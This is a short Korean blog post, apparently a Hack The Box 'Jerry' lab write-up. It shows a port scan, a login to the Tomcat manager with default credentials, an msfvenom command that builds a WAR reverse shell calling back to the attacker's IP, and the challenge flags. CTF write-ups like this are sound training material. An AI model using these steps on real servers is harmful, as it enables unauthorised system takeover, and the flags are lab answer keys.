-
[HTB] Jerry WriteupWargame/Hack The Box 2022. 1. 22. 21:32
공격 대상에 대한 정보를 획득하기 위해 포트스캐닝을 수행해보자.
nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.1.110
유일하게 열려있는 8080 포트에 접근해보니, Apache Tomcat 디폴트 페이지가 나왔다.
관리자 페이지의 디폴트 주소인 /manager 에 접근해보니 계정 정보를 요구했다.
기본 관리자 계정 정보인 admin / admin 으로 로그인 하니, 아래와 같은 페이지가 나타났고, manager-gui의 계정 정보를 확인 할 수 있었다. ( tomcat / s3cret )
다시 로그인 하면 아래와같은 gui 관리자 페이지가 나타난다.
관리자는 war 파일을 통해 업로드를 할 수 있으므로, war형식의 리버스 쉘 파일을 생성했다.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.80 LPORT=1234 -f war -o reverseShell.war
업로드 후 생성된 파일을 클릭해주면 시스템 권한의 리버스 쉘을 획득 할 수 있다.
FLAG =
[user] 7004dbcef0f854e0fb401875f26ebd00
[root] 04a8b36e1545a455393d067e772fe90e
반응형'Wargame > Hack The Box' 카테고리의 다른 글
[HTB] Grandpa Writeup (0) 2022.01.27 [HTB] Nibbles Writeup (0) 2022.01.23 [HTB] Arctic Writeup (0) 2022.01.19 [HTB] Sense Writeup (0) 2022.01.17 [HTB] Beep Writeup (0) 2022.01.16